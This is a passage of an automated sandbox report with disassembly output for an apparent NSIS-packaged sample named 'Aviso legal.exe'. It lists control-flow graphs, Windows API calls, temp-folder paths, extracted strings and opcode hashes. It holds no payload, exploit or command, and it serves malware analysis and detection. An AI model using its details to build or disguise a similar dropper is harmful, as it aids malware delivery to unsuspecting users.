                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Aviso legal.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                • API String ID: 2803837635-1714225219
                                • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 506 40657a-406585 507 406587-406596 506->507 508 406598-4065ae 506->508 507->508 509 4065b0-4065bd 508->509 510 4065c6-4065cf 508->510 509->510 511 4065bf-4065c2 509->511 512 4065d5 510->512 513 4067aa-4067b5 510->513 511->510 514 4065da-4065e7 512->514 515 4067c0-4067c1 513->515 516 4067b7-4067bb call 40653d 513->516 514->513 517 4065ed-4065f6 514->517 516->515 519 406788 517->519 520 4065fc-406639 517->520 523 406796-406799 519->523 524 40678a-406794 519->524 521 40672c-406731 520->521 522 40663f-406646 520->522 528 406733-406739 521->528 529 406764-406769 521->529 525 406648-40664a 522->525 526 40664b-40664d 522->526 527 40679b-4067a4 523->527 524->527 525->526 530 40668a-40668d 526->530 531 40664f-406676 call 40640b 526->531 527->513 534 4065d7 527->534 535 406749-406755 call 40653d 528->535 536 40673b-406747 call 406484 528->536 532 406778-406786 lstrlenW 529->532 533 40676b-406773 call 40657a 529->533 540 40669d-4066a0 530->540 541 40668f-40669b GetSystemDirectoryW 530->541 551 406713-406717 531->551 552 40667c-406685 call 40657a 531->552 532->527 533->532 534->514 544 40675a-406760 535->544 536->544 547 4066a2-4066b0 GetWindowsDirectoryW 540->547 548 406709-40670b 540->548 546 40670d-406711 541->546 544->532 549 406762 544->549 546->551 553 406724-40672a call 4067c4 546->553 547->548 548->546 550 4066b2-4066ba 548->550 549->553 557 4066d1-4066e7 SHGetSpecialFolderLocation 550->557 558 4066bc-4066c5 550->558 551->553 554 406719-40671f lstrcatW 551->554 552->546 553->532 554->553 559 406705 557->559 560 4066e9-406703 SHGetPathFromIDListW CoTaskMemFree 557->560 563 4066cd-4066cf 558->563 559->548 560->546 560->559 563->546 563->557
                                APIs
                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00000000,00425A20,75E023A0), ref: 004066A8
                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000), ref: 00406779
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                • API String ID: 4260037668-3785291791
                                • Opcode ID: 53df47af1f5a73dc8aac5f91b902a2f592a76225dad1704ff93b3cf34011d1c5
                                • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                • Opcode Fuzzy Hash: 53df47af1f5a73dc8aac5f91b902a2f592a76225dad1704ff93b3cf34011d1c5
                                • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 564 4032b4-4032cb 565 4032d4-4032dd 564->565 566 4032cd 564->566 567 4032e6-4032eb 565->567 568 4032df 565->568 566->565 569 4032fb-403308 call 4034cf 567->569 570 4032ed-4032f6 call 4034e5 567->570 568->567 574 4034bd 569->574 575 40330e-403312 569->575 570->569 576 4034bf-4034c0 574->576 577 403468-40346a 575->577 578 403318-403361 GetTickCount 575->578 581 4034c8-4034cc 576->581 579 4034aa-4034ad 577->579 580 40346c-40346f 577->580 582 4034c5 578->582 583 403367-40336f 578->583 584 4034b2-4034bb call 4034cf 579->584 585 4034af 579->585 580->582 586 403471 580->586 582->581 587 403371 583->587 588 403374-403382 call 4034cf 583->588 584->574 598 4034c2 584->598 585->584 591 403474-40347a 586->591 587->588 588->574 597 403388-403391 588->597 594 40347c 591->594 595 40347e-40348c call 4034cf 591->595 594->595 595->574 601 40348e-40349a call 4060df 595->601 600 403397-4033b7 call 406a65 597->600 598->582 606 403460-403462 600->606 607 4033bd-4033d0 GetTickCount 600->607 608 403464-403466 601->608 609 40349c-4034a6 601->609 606->576 610 4033d2-4033da 607->610 611 40341b-40341d 607->611 608->576 609->591 612 4034a8 609->612 613 4033e2-403413 MulDiv wsprintfW call 40559f 610->613 614 4033dc-4033e0 610->614 615 403454-403458 611->615 616 40341f-403423 611->616 612->582 623 403418 613->623 614->611 614->613 615->583 617 40345e 615->617 619 403425-40342c call 4060df 616->619 620 40343a-403445 616->620 617->582 624 403431-403433 619->624 622 403448-40344c 620->622 622->600 625 403452 622->625 623->611 624->608 626 403435-403438 624->626 625->582 626->622
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CountTick$wsprintf
                                • String ID: *B$ ZB$ A$ A$... %d%%$}8@
                                • API String ID: 551687249-3683892814
                                • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 627 40176f-401794 call 402da6 call 405e83 632 401796-40179c call 40653d 627->632 633 40179e-4017b0 call 40653d call 405e0c lstrcatW 627->633 638 4017b5-4017b6 call 4067c4 632->638 633->638 642 4017bb-4017bf 638->642 643 4017c1-4017cb call 406873 642->643 644 4017f2-4017f5 642->644 652 4017dd-4017ef 643->652 653 4017cd-4017db CompareFileTime 643->653 646 4017f7-4017f8 call 406008 644->646 647 4017fd-401819 call 40602d 644->647 646->647 654 40181b-40181e 647->654 655 40188d-4018b6 call 40559f call 4032b4 647->655 652->644 653->652 656 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 654->656 657 40186f-401879 call 40559f 654->657 669 4018b8-4018bc 655->669 670 4018be-4018ca SetFileTime 655->670 656->642 691 401864-401865 656->691 667 401882-401888 657->667 671 402c33 667->671 669->670 673 4018d0-4018db FindCloseChangeNotification 669->673 670->673 675 402c35-402c39 671->675 676 4018e1-4018e4 673->676 677 402c2a-402c2d 673->677 678 4018e6-4018f7 call 40657a lstrcatW 676->678 679 4018f9-4018fc call 40657a 676->679 677->671 685 401901-402398 678->685 679->685 689 40239d-4023a2 685->689 690 402398 call 405b9d 685->690 689->675 690->689 691->667 692 401867-401868 691->692 692->657
                                APIs
                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid,?,?,00000031), ref: 004017D5
                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00425A20,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00425A20,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00403418), ref: 004055FA
                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll), ref: 0040560C
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                • String ID: C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid$C:\Users\user\AppData\Local\Temp\nscAAC8.tmp$C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll$Call
                                • API String ID: 1941528284-686570185
                                • Opcode ID: 3dea8835135b3834e701fe10f85874e2ee0770673dec5a47873efbfea76d0da0
                                • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                • Opcode Fuzzy Hash: 3dea8835135b3834e701fe10f85874e2ee0770673dec5a47873efbfea76d0da0
                                • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 693 40559f-4055b4 694 4055ba-4055cb 693->694 695 40566b-40566f 693->695 696 4055d6-4055e2 lstrlenW 694->696 697 4055cd-4055d1 call 40657a 694->697 699 4055e4-4055f4 lstrlenW 696->699 700 4055ff-405603 696->700 697->696 699->695 701 4055f6-4055fa lstrcatW 699->701 702 405612-405616 700->702 703 405605-40560c SetWindowTextW 700->703 701->700 704 405618-40565a SendMessageW * 3 702->704 705 40565c-40565e 702->705 703->702 704->705 705->695 706 405660-405663 705->706 706->695
                                APIs
                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00425A20,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00425A20,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00403418), ref: 004055FA
                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll), ref: 0040560C
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000), ref: 00406779
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll
                                • API String ID: 1495540970-4120299463
                                • Opcode ID: 61fc35634f83d303f4bb0fdf458391b4626c4708e393b35bd1b1a29fdfa46634
                                • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                • Opcode Fuzzy Hash: 61fc35634f83d303f4bb0fdf458391b4626c4708e393b35bd1b1a29fdfa46634
                                • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 707 4026ec-402705 call 402d84 710 402c2a-402c2d 707->710 711 40270b-402712 707->711 714 402c33-402c39 710->714 712 402714 711->712 713 402717-40271a 711->713 712->713 715 402720-40272f call 40649d 713->715 716 40287e-402886 713->716 715->716 720 402735 715->720 716->710 721 40273b-40273f 720->721 722 4027d4-4027d7 721->722 723 402745-402760 ReadFile 721->723 724 4027d9-4027dc 722->724 725 4027ef-4027ff call 4060b0 722->725 723->716 726 402766-40276b 723->726 724->725 727 4027de-4027e9 call 40610e 724->727 725->716 736 402801 725->736 726->716 729 402771-40277f 726->729 727->716 727->725 732 402785-402797 MultiByteToWideChar 729->732 733 40283a-402846 call 406484 729->733 732->736 737 402799-40279c 732->737 733->714 739 402804-402807 736->739 740 40279e-4027a9 737->740 739->733 741 402809-40280e 739->741 740->739 742 4027ab-4027d0 SetFilePointer MultiByteToWideChar 740->742 744 402810-402815 741->744 745 40284b-40284f 741->745 742->740 743 4027d2 742->743 743->736 744->745 748 402817-40282a 744->748 746 402851-402855 745->746 747 40286c-402878 SetFilePointer 745->747 749 402857-40285b 746->749 750 40285d-40286a 746->750 747->716 748->716 751 40282c-402832 748->751 749->747 749->750 750->716 751->721 752 402838 751->752 752->716
                                APIs
                                • ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                  • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                • String ID: 9
                                • API String ID: 163830602-2366072709
                                • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 753 40689a-4068ba GetSystemDirectoryW 754 4068bc 753->754 755 4068be-4068c0 753->755 754->755 756 4068d1-4068d3 755->756 757 4068c2-4068cb 755->757 758 4068d4-406907 wsprintfW LoadLibraryExW 756->758 757->756 759 4068cd-4068cf 757->759 759->758
                                APIs
                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                • wsprintfW.USER32 ref: 004068EC
                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                • String ID: %s%S.dll$UXTHEME$\
                                • API String ID: 2200240437-1946221925
                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 760 405a6e-405ab9 CreateDirectoryW 761 405abb-405abd 760->761 762 405abf-405acc GetLastError 760->762 763 405ae6-405ae8 761->763 762->763 764 405ace-405ae2 SetFileSecurityW 762->764 764->761 765 405ae4 GetLastError 764->765 765->763
                                APIs
                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                • GetLastError.KERNEL32 ref: 00405AC5
                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                • GetLastError.KERNEL32 ref: 00405AE4
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
